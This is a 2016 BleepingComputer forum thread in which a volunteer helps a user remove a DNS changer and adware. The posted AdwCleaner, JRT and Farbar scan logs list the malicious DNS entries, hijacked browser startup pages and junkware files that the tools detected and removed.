Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Is it safe to get rid of these files?


  • This topic is locked This topic is locked
12 replies to this topic

#1 Neki

Neki

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:09:22 PM

Posted 02 February 2016 - 05:59 AM

I have been using AdwCleaner for a while now and it does help a lot. Sometimes ads pop up in my browser and I would just run AdwCleaner and it fixes the problem. Every time before I do this, of course it shows the findings which it detected which are ready to be cleaned but the only boxes I left checked are the ones that are related to the ads that have been bugging my browser and didn't tamper the ones that are related to the registry and other stuff because I don't even know what they are supposed to be. I left their boxes unchecked as I was nervous it might do something wrong with my registry (and other stuff too). Judging by the fact that AdwCleaner did detect them, should I delete these files? I would just like to know if it is safe to proceed with the cleaning. Here is my log:

 

# AdwCleaner v5.030 - Logfile created 02/02/2016 at 17:29:29
# Updated 17/01/2016 by Xplode
# Database : 2016-01-31.1 [Server]
# Operating system : Windows 8.1 Pro  (x64)
# Username : Neki - WIN8PC
# Running from : C:\Users\Neki\Desktop\Adwcleaner 5.030.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
File Found : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Key Found : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer] - 82.163.142.3 95.211.158.130
 
***** [ Web browsers ] *****
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[S20].txt - [2443 bytes] ##########
 


BC AdBot (Login to Remove)

 


#2 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 02 February 2016 - 08:27 AM

Hello Neki and welcome to Bleeping Computer.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested


You have a DNS changer and those entries need to be removed.

===================================================

Note: Please run these in the order given in the instructions.

===================================================

Run AdwCleaner


  • run AdwCleaner again
  • when it has finished, make sure ALL are selected and press Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Download and run Junkware Removal Tool

thisisujrt.gif Please download Junkware Removal Tool to your desktop.

  • shut down your protection software now to avoid potential conflicts.
  • run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator"
  • the tool will open and start scanning your system
  • please be patient as this can take a while to complete depending on your system's specifications
  • on completion, a log (JRT.txt) is saved to your desktop and will automatically open
  • post the contents of JRT.txt into your next message.

===================================================

Run Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • press Scan button
  • it will produce a log called Frst.txt in the same directory the tool is run from
  • please copy and paste log back here.
  • the first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the Frst.txt into your reply.

Logs to include with next post:

AdwCleaner log
JRT.txt
Frst.txt
Addition.txt


Thanks

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#3 Neki

Neki
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Philippines
  • Local time:09:22 PM

Posted 02 February 2016 - 12:26 PM

Greetings, Satchfan! First of all, thanks for replying as quick as possible.  :thumbup2:
 

I have correctly followed every step that you've given me and I believe I was able to perform them successfully without any slip-ups.
Just like you asked, here are the logs:

 

[1] AdwCleaner Log ==================================================

 

# AdwCleaner v5.030 - Logfile created 02/02/2016 at 23:35:42
# Updated 17/01/2016 by Xplode
# Database : 2016-01-31.1 [Server]
# Operating system : Windows 8.1 Pro  (x64)
# Username : Neki - WIN8PC
# Running from : C:\Users\Neki\Desktop\Adwcleaner 5.030.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
[-] File Deleted : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer]
 
***** [ Web browsers ] *****
 
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://websearch.searchsun.info/?pid=377&r=2014/05/10&hid=2754430170790600472&lg=EN&cc=PH&unqvl=52
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://websearch.searchoholic.info/?pid=20687&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://websearch.searchoholic.info/?pid=3755&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://www.oursurfing.com/?type=hp&ts=1441799948&z=e48dcd92dcbe589d6d53b4fg2z3z5g7mbt2t2t8z8q&from=exp1&uid=WDCXWD5000LPVX-00V0TT0_WD-WX31A541316113161
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : dgpdioedihjhncjafcpgbbjdpbbkikmi
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C9].txt - [3337 bytes] ##########
 

 

[2] JRT =============================================================

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.2 (01.06.2016)
Operating System: Windows 8.1 Pro x64 
Ran by Neki (Administrator) on Tue 02/02/2016 at 23:53:06.53
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 14 
 
Successfully deleted: C:\ProgramData\13782443717249391982 (Folder) 
Successfully deleted: C:\ProgramData\gWdsManProg (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Local\freefileviewer (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gdalhedleemkkdjddjgfjmcnbpejpapp_0.localstorage (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage-journal (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.metrolyrics.com_0.localstorage-journal (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.metrolyrics.com_0.localstorage (File) 
Successfully deleted: C:\Users\Neki\AppData\Roaming\3909 (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Roaming\freefileviewer (Folder) 
Successfully deleted: C:\Windows\system32\Tasks\FreeFileViewerUpdateChecker (Task)
Successfully deleted: C:\Windows\Tasks\FreeFileViewerUpdateChecker.job (Task) 
Successfully deleted: C:\Program Files (x86)\freefileviewer (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Roaming\appdataFr25.bin (File) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 02/02/2016 at 23:55:19.95
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 

[3] Frst =============================================================

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by Neki (administrator) on WIN8PC (03-02-2016 00:26:06)
Running from C:\Users\Neki\Desktop
Loaded Profiles: Neki (Available Profiles: Neki & DefaultAppPool)
Platform: Windows 8.1 Pro (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
() C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
() C:\ProgramData\MobileBrServ\mbbService.exe
() C:\Program Files (x86)\Nonchalant Necessary\Nonchalant Necessary.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Student\Microsoft Student with Encarta Premium 2009 DVD\EDICT.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated)
HKLM\...\Run: [MouseDriver] => C:\Windows\system32\TiltWheelMouse.exe [241152 2013-04-09] (Pixart Imaging Inc)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [uTorrent] => C:\Users\Neki\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-13] (BitTorrent Inc.)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [30877280 2014-12-11] (Skype Technologies S.A.)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [E06AXLRD_477047609] => "C:\Program Files (x86)\Microsoft Encarta\Encarta Premium DVD 2006\EDICT.EXE" -m
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files (x86)\DAEMON Tools Ultra\DTAgent.exe [3198224 2014-04-28] (Disc Soft Ltd)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [L09AXLRD_7252718] => C:\Program Files (x86)\Microsoft Student\Microsoft Student with Encarta Premium 2009 DVD\EDICT.EXE [351000 2008-06-03] (Microsoft Corporation)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATII2E.EXE [283232 2015-01-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATII2E.EXE [283232 2015-01-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8358680 2015-06-02] (Piriform Ltd)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {36857aaa-9935-11e4-8253-60eb69f30525} - "F:\setup.exe" 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {4f0e6d74-9aea-11e4-8254-68a3c44fd64f} - "F:\LaunchU3.exe" -a
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {8deef359-a3ce-11e4-825e-60eb69f30525} - "F:\AutoRun.exe" 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {d932a234-9fb0-11e4-825a-60eb69f30525} - "F:\AutoRun.exe" 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {d932a28a-9fb0-11e4-825a-60eb69f30525} - "F:\AutoRun.exe" 
Startup: C:\Users\Neki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.lnk [2015-01-23]
ShortcutTarget: Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.lnk -> C:\ProgramData\{7f323ec5-58cb-c7f1-7f32-23ec558cfb15}\Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.exe (No File)
Startup: C:\Users\Neki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Minecraft 1.8.3 TeamExtreme.lnk [2015-05-11]
ShortcutTarget: Minecraft 1.8.3 TeamExtreme.lnk -> C:\ProgramData\{f81caf50-5fb6-c129-f81c-caf505fbbd41}\Minecraft 1.8.3 TeamExtreme.exe (No File)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{5A115C14-3FF2-447F-87EA-98DFE0108439}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{D309BDAB-419D-477A-857A-E5B82A014752}: [DhcpNameServer] 192.168.8.1 192.168.8.1
 
Internet Explorer:
==================
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.domaincentar.com/
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\ssv.dll [2016-01-29] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-29] (Oracle Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Neki\AppData\Roaming\Mozilla\Firefox\Profiles\tcl5pmwb.default-1441896843992
FF SelectedSearchEngine: Google
FF Homepage: hxxp://search.domaincentar.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_245.dll [2015-12-05] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_245.dll [2015-12-05] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-29] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-01-10] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-30] (Google Inc.)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin HKU\S-1-5-21-1800402837-2610492725-117470784-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Neki\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-05] (Unity Technologies ApS)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://websearch.searchsun.info/?pid=377&r=2014/05/10&hid=2754430170790600472&lg=EN&cc=PH&unqvl=52","hxxp://websearch.searchoholic.info/?pid=20687&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72","hxxp://websearch.searchoholic.info/?pid=3755&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72","hxxp://www.oursurfing.com/?type=hp&ts=1441799948&z=e48dcd92dcbe589d6d53b4fg2z3z5g7mbt2t2t8z8q&from=exp1&uid=WDCXWD5000LPVX-00V0TT0_WD-WX31A541316113161"
CHR DefaultSearchKeyword: Default -> google.com.ph_
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-09]
CHR Extension: (Google Docs) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-09]
CHR Extension: (Google Drive) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (YouTube) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Google Search) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Google Sheets) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-09]
CHR Extension: (Google Docs Offline) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-09-09]
CHR Extension: (My Chrome Theme) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2016-01-30]
CHR Extension: (Gmail) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-09]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2003-02-20] (Microsoft Corporation) [File not signed]
S3 Disc Soft Bus Service; C:\Program Files (x86)\DAEMON Tools Ultra\DiscSoftBusService.exe [813328 2014-04-28] (Disc Soft Ltd)
S2 Globe Tattoo Broadband. RunOuc; C:\Program Files (x86)\Globe Tattoo Broadband\UpdateDog\ouc.exe [218624 2015-01-19] () [File not signed]
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [339456 2010-11-16] () [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [239696 2013-07-23] ()
R2 Nonchalant Necessary; C:\Program Files (x86)\Nonchalant Necessary\Nonchalant Necessary.exe [8016666 2015-06-17] () [File not signed] <==== ATTENTION
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [635672 2014-05-22] (Wacom Technology, Corp.)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 athr; C:\Windows\system32\DRIVERS\athwnx.sys [3680256 2013-06-18] (Qualcomm Atheros Communications, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [131584 2013-08-22] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [32640 2013-08-22] (Microsoft Corporation)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R3 dtscsibus; C:\Windows\system32\DRIVERS\dtscsibus.sys [29696 2015-01-11] (Disc Soft Ltd)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 ewusbnet; C:\Windows\system32\DRIVERS\ewusbnet.sys [256000 2015-01-19] (Huawei Technologies Co., Ltd.)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2015-01-19] (Huawei Technologies Co., Ltd.)
S3 t_mouse.sys; C:\Windows\system32\DRIVERS\t_mouse.sys [6144 2013-04-09] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
S3 moufiltr; \SystemRoot\System32\drivers\moufiltr.sys [X]
